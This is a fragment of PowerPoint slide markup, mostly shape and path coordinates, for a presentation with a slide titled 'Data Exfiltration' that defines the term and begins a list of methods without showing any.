                    <a:pt x="27448" y="1589613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20281" y="1543610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14197" y="1497487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9194" y="1451264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5273" y="1404960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2434" y="1358596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676" y="1312191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1265766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404" y="1219340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1889" y="1172933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4455" y="1126565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8102" y="1080257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12829" y="1034027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18636" y="987896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25523" y="941884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33490" y="896011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42536" y="850297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52662" y="804761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63868" y="759423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76152" y="714304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89516" y="669424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103958" y="624801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119479" y="580457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136078" y="536411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153756" y="492683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172512" y="449292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192346" y="406260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213257" y="363605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235246" y="321348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258313" y="279509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282457" y="238107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307678" y="197163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333976" y="156696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361350" y="116726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389801" y="77273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419329" y="38358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449932" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525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443465" y="4552949"/>
              <a:ext cx="1155700" cy="882650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1155700" h="882650">
                  <a:moveTo>
                    <a:pt x="1030097" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="125094" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85555" y="7491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51215" y="28358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24136" y="60185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6377" y="100559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="147065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="735329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6377" y="781836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24136" y="822210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51215" y="854037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85555" y="874904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125094" y="882396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1030097" y="882396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069636" y="874904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103976" y="854037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1131055" y="822210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148814" y="781836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155191" y="735329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155191" y="147065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148814" y="100559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1131055" y="60185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103976" y="28358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069636" y="7491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1030097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43465" y="4552949"/>
              <a:ext cx="1155700" cy="882650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1155700" h="882650">
                  <a:moveTo>
                    <a:pt x="0" y="147065"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6377" y="100559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24136" y="60185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51215" y="28358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85555" y="7491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125094" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1030097" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069636" y="7491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103976" y="28358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1131055" y="60185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148814" y="100559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155191" y="147065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155191" y="735329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148814" y="781836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1131055" y="822210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103976" y="854037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069636" y="874904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1030097" y="882396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125094" y="882396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85555" y="874904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51215" y="854037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24136" y="822210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6377" y="781836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="735329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="14706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9849357" y="4781753"/>
            <a:ext cx="3429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5" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>03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614157" y="6303517"/>
            <a:ext cx="1181100" cy="908050"/>
            <a:chOff x="7614157" y="6303517"/>
            <a:chExt cx="1181100" cy="908050"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7626857" y="6316217"/>
              <a:ext cx="1155700" cy="882650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1155700" h="882650">
                  <a:moveTo>
                    <a:pt x="1030097" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="125095" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85555" y="7491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51215" y="28358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24136" y="60185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6377" y="100559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="147065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="735329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6377" y="781836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24136" y="822210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51215" y="854037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85555" y="874904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125095" y="882395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1030097" y="882395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069636" y="874904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103976" y="854037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1131055" y="822210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148814" y="781836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155192" y="735329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155192" y="147065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148814" y="100559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1131055" y="60185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103976" y="28358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069636" y="7491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1030097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626857" y="6316217"/>
              <a:ext cx="1155700" cy="882650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1155700" h="882650">
                  <a:moveTo>
                    <a:pt x="0" y="147065"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6377" y="100559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24136" y="60185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51215" y="28358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85555" y="7491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125095" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1030097" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069636" y="7491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103976" y="28358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1131055" y="60185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148814" y="100559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155192" y="147065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155192" y="735329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148814" y="781836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1131055" y="822210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103976" y="854037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069636" y="874904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1030097" y="882395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125095" y="882395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85555" y="874904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51215" y="854037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24136" y="822210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6377" y="781836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="735329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="14706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8032750" y="6545402"/>
            <a:ext cx="3429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5" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>02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799073" y="4540250"/>
            <a:ext cx="1181100" cy="908050"/>
            <a:chOff x="5799073" y="4540250"/>
            <a:chExt cx="1181100" cy="908050"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="object 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5811773" y="4552950"/>
              <a:ext cx="1155700" cy="882650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1155700" h="882650">
                  <a:moveTo>
                    <a:pt x="1030097" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="125095" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85555" y="7491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51215" y="28358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24136" y="60185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6377" y="100559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="147065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="735329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6377" y="781836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24136" y="822210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51215" y="854037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85555" y="874904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125095" y="882396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1030097" y="882396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069636" y="874904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103976" y="854037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1131055" y="822210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148814" y="781836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155192" y="735329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155192" y="147065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148814" y="100559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1131055" y="60185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103976" y="28358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069636" y="7491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1030097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811773" y="4552950"/>
              <a:ext cx="1155700" cy="882650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1155700" h="882650">
                  <a:moveTo>
                    <a:pt x="0" y="147065"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6377" y="100559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24136" y="60185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51215" y="28358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85555" y="7491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125095" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1030097" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069636" y="7491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103976" y="28358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1131055" y="60185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148814" y="100559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155192" y="147065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155192" y="735329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148814" y="781836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1131055" y="822210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103976" y="854037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069636" y="874904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1030097" y="882396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125095" y="882396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85555" y="874904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51215" y="854037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24136" y="822210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6377" y="781836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="735329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="14706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6216522" y="4781753"/>
            <a:ext cx="3429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5" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>01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47846" y="4747386"/>
            <a:ext cx="154051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est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004295" y="4752288"/>
            <a:ext cx="148653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at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978522" y="7425487"/>
            <a:ext cx="2452370" cy="79057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70"/>
              </a:spcBef>
            </a:pP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ans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endParaRPr sz="2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(or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at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motion)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14843" y="4227576"/>
            <a:ext cx="1551431" cy="1549908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44131" y="306451"/>
            <a:ext cx="296735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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-190">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exfiltration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98319" y="1756298"/>
            <a:ext cx="11651615" cy="1049655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="1885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485"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="8780780" algn="l"/>
              </a:tabLst>
            </a:pP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Any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autho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ized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cop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ieva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f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om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sy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m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fer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	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da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exfiltr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ti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n.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="3175">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1395"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="1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ome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dat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xfi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atio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method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ar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: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9528" y="760476"/>
            <a:ext cx="4102608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755892" y="4058411"/>
            <a:ext cx="2743200" cy="2711450"/>
            <a:chOff x="6755892" y="4058411"/>
            <a:chExt cx="2743200" cy="2711450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6755892" y="4058411"/>
              <a:ext cx="2743200" cy="2711450"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2743200" h="2711450">
                  <a:moveTo>
                    <a:pt x="1240536" y="2458212"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1192339" y="2451506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1144828" y="2442794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1098003" y="2432126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051953" y="2419527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1006678" y="2405075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="962266" y="2388781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="918730" y="2370721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="876122" y="2350909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="834504" y="2329408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="793902" y="2306269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="754367" y="2281529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715937" y="2255215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678675" y="2227402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642607" y="2198128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607783" y="2167420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="574255" y="2135340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="542061" y="2101926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511251" y="2067217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481863" y="2031276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453948" y="1994128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427545" y="1955838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402704" y="1916430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379476" y="1875967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357886" y="1834476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337997" y="1792020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319849" y="1748624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303491" y="1704352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288950" y="1659242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276288" y="1613331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265557" y="1566672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19812" y="1566672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28714" y="1614055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39243" y="1660842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51371" y="1707007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65049" y="1752536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80264" y="1797392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96964" y="1841525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115138" y="1884934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134759" y="1927580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155778" y="1969414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178181" y="2010435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201917" y="2050580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226974" y="2089848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253314" y="2128189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280924" y="2165591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309740" y="2202002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339763" y="2237409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343827" y="2241905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157480" y="2418080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1524" y="2262124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1524" y="2711196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450723" y="2711196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291846" y="2550922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477875" y="2373973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543229" y="2426906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580745" y="2454376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619213" y="2480602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="658609" y="2505545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="698881" y="2529167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="740029" y="2551442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="781989" y="2572347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824763" y="2591841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="868286" y="2609900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912558" y="2626487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="957541" y="2641587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1003185" y="2655151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049489" y="2667165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1096403" y="2677579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1143901" y="2686380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1191958" y="2693543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1240536" y="2699004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1240536" y="2458212"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2743200" h="2711450">
                  <a:moveTo>
                    <a:pt x="1240536" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1192631" y="5473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1145247" y="12573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1098397" y="21285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1052118" y="31559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1006436" y="43383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="961390" y="56718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916990" y="71539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="873264" y="87820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830262" y="105537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788009" y="124637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="746518" y="145122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="705840" y="166941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665975" y="190080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626973" y="214490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588873" y="240169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="551675" y="267068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515429" y="295160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480148" y="324421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445884" y="354812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421119" y="378282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293116" y="242951"/>
                  </a:lnTo>
